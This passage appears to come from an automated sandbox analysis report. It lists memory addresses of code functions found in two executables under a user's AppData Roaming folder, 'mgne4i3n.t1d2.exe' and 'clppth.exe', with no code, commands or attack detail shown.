                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BE518C31_2_00007FF741BE518C
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD2CC431_2_00007FF741BD2CC4
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD0C6431_2_00007FF741BD0C64
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD148431_2_00007FF741BD1484
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BDFBD831_2_00007FF741BDFBD8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD73F431_2_00007FF741BD73F4
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BE33BC31_2_00007FF741BE33BC
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BE0B8431_2_00007FF741BE0B84
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BC8B2031_2_00007FF741BC8B20
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BE4F1031_2_00007FF741BE4F10
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD0E7031_2_00007FF741BD0E70
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BC95FB31_2_00007FF741BC95FB
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BDCD6C31_2_00007FF741BDCD6C
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD28C031_2_00007FF741BD28C0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD107431_2_00007FF741BD1074
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BDD88031_2_00007FF741BDD880
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD504031_2_00007FF741BD5040
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BC979B31_2_00007FF741BC979B
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BC9FCD31_2_00007FF741BC9FCD
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BE2F2031_2_00007FF741BE2F20
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BDFBD831_2_00007FF741BDFBD8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD1F3031_2_00007FF741BD1F30
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BE572831_2_00007FF741BE5728
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01A7637031_2_00007FFB01A76370
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB019A508031_2_00007FFB019A5080
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01A6723031_2_00007FFB01A67230
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB019A131031_2_00007FFB019A1310
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01A6568E31_2_00007FFB01A6568E
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01A0F91031_2_00007FFB01A0F910
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB019A420031_2_00007FFB019A4200
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01A141F031_2_00007FFB01A141F0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01A4419031_2_00007FFB01A44190
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB019D411031_2_00007FFB019D4110
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB019920F031_2_00007FFB019920F0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB019BC61831_2_00007FFB019BC618
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01FD02D031_2_00007FFB01FD02D0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01EFB9F031_2_00007FFB01EFB9F0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01E860C031_2_00007FFB01E860C0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01EE4B9031_2_00007FFB01EE4B90
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01EE3D6031_2_00007FFB01EE3D60
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01F27FE031_2_00007FFB01F27FE0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01EDD53031_2_00007FFB01EDD530
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01F6E64031_2_00007FFB01F6E640
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01EE028031_2_00007FFB01EE0280
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01F9AAD031_2_00007FFB01F9AAD0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01EE3A4031_2_00007FFB01EE3A40
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01E73A4731_2_00007FFB01E73A47
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01E8C9F831_2_00007FFB01E8C9F8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01F14B6031_2_00007FFB01F14B60
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01F90BD031_2_00007FFB01F90BD0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB040B12F031_2_00007FFB040B12F0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB040B188031_2_00007FFB040B1880
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB0B4877F831_2_00007FFB0B4877F8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB0B48100031_2_00007FFB0B481000
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB0B483DC031_2_00007FFB0B483DC0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB0B482DC031_2_00007FFB0B482DC0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB0B48608031_2_00007FFB0B486080
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB0B483B2031_2_00007FFB0B483B20
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB226C531C31_2_00007FFB226C531C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BB4F1038_2_00007FF795BB4F10
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B9100038_2_00007FF795B91000
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BB5C7438_2_00007FF795BB5C74
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA0E7038_2_00007FF795BA0E70
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B995FB38_2_00007FF795B995FB
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BACD6C38_2_00007FF795BACD6C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA28C038_2_00007FF795BA28C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA107438_2_00007FF795BA1074
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BAD88038_2_00007FF795BAD880
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA504038_2_00007FF795BA5040
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B9979B38_2_00007FF795B9979B
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B99FCD38_2_00007FF795B99FCD
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BB2F2038_2_00007FF795BB2F20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA1F3038_2_00007FF795BA1F30
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BAFBD838_2_00007FF795BAFBD8
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BB572838_2_00007FF795BB5728
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA7AAC38_2_00007FF795BA7AAC
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA0A6038_2_00007FF795BA0A60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA128038_2_00007FF795BA1280
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BB8A3838_2_00007FF795BB8A38
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BAD20038_2_00007FF795BAD200
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA91B038_2_00007FF795BA91B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BB518C38_2_00007FF795BB518C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA2CC438_2_00007FF795BA2CC4
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA0C6438_2_00007FF795BA0C64
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA148438_2_00007FF795BA1484
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BAFBD838_2_00007FF795BAFBD8
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA73F438_2_00007FF795BA73F4
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BB33BC38_2_00007FF795BB33BC
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BB0B8438_2_00007FF795BB0B84
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B98B2038_2_00007FF795B98B20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B9100042_2_00007FF795B91000
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB5C7442_2_00007FF795BB5C74
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB4F1042_2_00007FF795BB4F10
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA0E7042_2_00007FF795BA0E70
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B995FB42_2_00007FF795B995FB
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BACD6C42_2_00007FF795BACD6C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA28C042_2_00007FF795BA28C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA107442_2_00007FF795BA1074
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BAD88042_2_00007FF795BAD880
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA504042_2_00007FF795BA5040
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B9979B42_2_00007FF795B9979B
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B99FCD42_2_00007FF795B99FCD
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB2F2042_2_00007FF795BB2F20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA1F3042_2_00007FF795BA1F30
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BAFBD842_2_00007FF795BAFBD8
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB572842_2_00007FF795BB5728
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA7AAC42_2_00007FF795BA7AAC
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA0A6042_2_00007FF795BA0A60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA128042_2_00007FF795BA1280
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB8A3842_2_00007FF795BB8A38
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BAD20042_2_00007FF795BAD200
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA91B042_2_00007FF795BA91B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB518C42_2_00007FF795BB518C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA2CC442_2_00007FF795BA2CC4
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA0C6442_2_00007FF795BA0C64
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA148442_2_00007FF795BA1484
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BAFBD842_2_00007FF795BAFBD8
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA73F442_2_00007FF795BA73F4
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB33BC42_2_00007FF795BB33BC
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB0B8442_2_00007FF795BB0B84
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B98B2042_2_00007FF795B98B20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB0D63188042_2_00007FFB0D631880
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB0D6312F042_2_00007FFB0D6312F0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B192042_2_00007FFB1C3B1920
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B1A0042_2_00007FFB1C3B1A00
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B55D042_2_00007FFB1C3B55D0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3BFA8842_2_00007FFB1C3BFA88
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B465042_2_00007FFB1C3B4650
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B5F0042_2_00007FFB1C3B5F00
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B12B042_2_00007FFB1C3B12B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B2F8042_2_00007FFB1C3B2F80
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B8F4042_2_00007FFB1C3B8F40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B73F842_2_00007FFB1C3B73F8
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B23B042_2_00007FFB1C3B23B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C453D6042_2_00007FFB1C453D60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4DE64042_2_00007FFB1C4DE640
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C497FE042_2_00007FFB1C497FE0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3F60C042_2_00007FFB1C3F60C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C46B9F042_2_00007FFB1C46B9F0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5402D042_2_00007FFB1C5402D0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C454B9042_2_00007FFB1C454B90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4173A042_2_00007FFB1C4173A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4864B042_2_00007FFB1C4864B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4BAD9042_2_00007FFB1C4BAD90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3F359042_2_00007FFB1C3F3590
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C44D53042_2_00007FFB1C44D530
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C40F52042_2_00007FFB1C40F520
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C504DF042_2_00007FFB1C504DF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C406DF042_2_00007FFB1C406DF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4B2DB042_2_00007FFB1C4B2DB0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3F667A42_2_00007FFB1C3F667A
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C49EE6042_2_00007FFB1C49EE60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3EFE2042_2_00007FFB1C3EFE20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C47065042_2_00007FFB1C470650
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C411EF042_2_00007FFB1C411EF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C52271042_2_00007FFB1C522710
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3F871042_2_00007FFB1C3F8710
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4076B042_2_00007FFB1C4076B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C40FF3042_2_00007FFB1C40FF30
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C49D01042_2_00007FFB1C49D010
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C50DFF042_2_00007FFB1C50DFF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4017C042_2_00007FFB1C4017C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4A806042_2_00007FFB1C4A8060
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C50B05042_2_00007FFB1C50B050
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3F905042_2_00007FFB1C3F9050
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C40E91042_2_00007FFB1C40E910
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4A611042_2_00007FFB1C4A6110
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3E10FE42_2_00007FFB1C3E10FE
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C45A10042_2_00007FFB1C45A100
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C41110042_2_00007FFB1C411100
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C45692042_2_00007FFB1C456920
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C47329042_2_00007FFB1C473290
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C515A6042_2_00007FFB1C515A60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4FEA9042_2_00007FFB1C4FEA90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C45028042_2_00007FFB1C450280
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3E3A4742_2_00007FFB1C3E3A47
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C453A4042_2_00007FFB1C453A40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C50AAD042_2_00007FFB1C50AAD0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4DC2C042_2_00007FFB1C4DC2C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C484B6042_2_00007FFB1C484B60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C41539042_2_00007FFB1C415390
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C40538042_2_00007FFB1C405380
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C456B3042_2_00007FFB1C456B30
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C437B4042_2_00007FFB1C437B40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C471BD042_2_00007FFB1C471BD0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C500BD042_2_00007FFB1C500BD0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4DA42042_2_00007FFB1C4DA420
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C505C2042_2_00007FFB1C505C20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C53342042_2_00007FFB1C533420
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C43344742_2_00007FFB1C433447
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C61F91042_2_00007FFB1C61F910
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C67568E42_2_00007FFB1C67568E
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C67723042_2_00007FFB1C677230
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B131042_2_00007FFB1C5B1310
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B508042_2_00007FFB1C5B5080
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C68637042_2_00007FFB1C686370
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5D3D0042_2_00007FFB1C5D3D00
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C659D6042_2_00007FFB1C659D60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64BD4042_2_00007FFB1C64BD40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5A3D3042_2_00007FFB1C5A3D30
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C629E9042_2_00007FFB1C629E90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62FE2042_2_00007FFB1C62FE20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5DFEE042_2_00007FFB1C5DFEE0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C68BF7042_2_00007FFB1C68BF70
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B5FB042_2_00007FFB1C5B5FB0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5DB91042_2_00007FFB1C5DB910
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64D96042_2_00007FFB1C64D960
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C6139E042_2_00007FFB1C6139E0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C6899A042_2_00007FFB1C6899A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C651A7042_2_00007FFB1C651A70
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C605A7042_2_00007FFB1C605A70
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5E5A5042_2_00007FFB1C5E5A50
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C685B1042_2_00007FFB1C685B10
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C665AF042_2_00007FFB1C665AF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64FAD042_2_00007FFB1C64FAD0
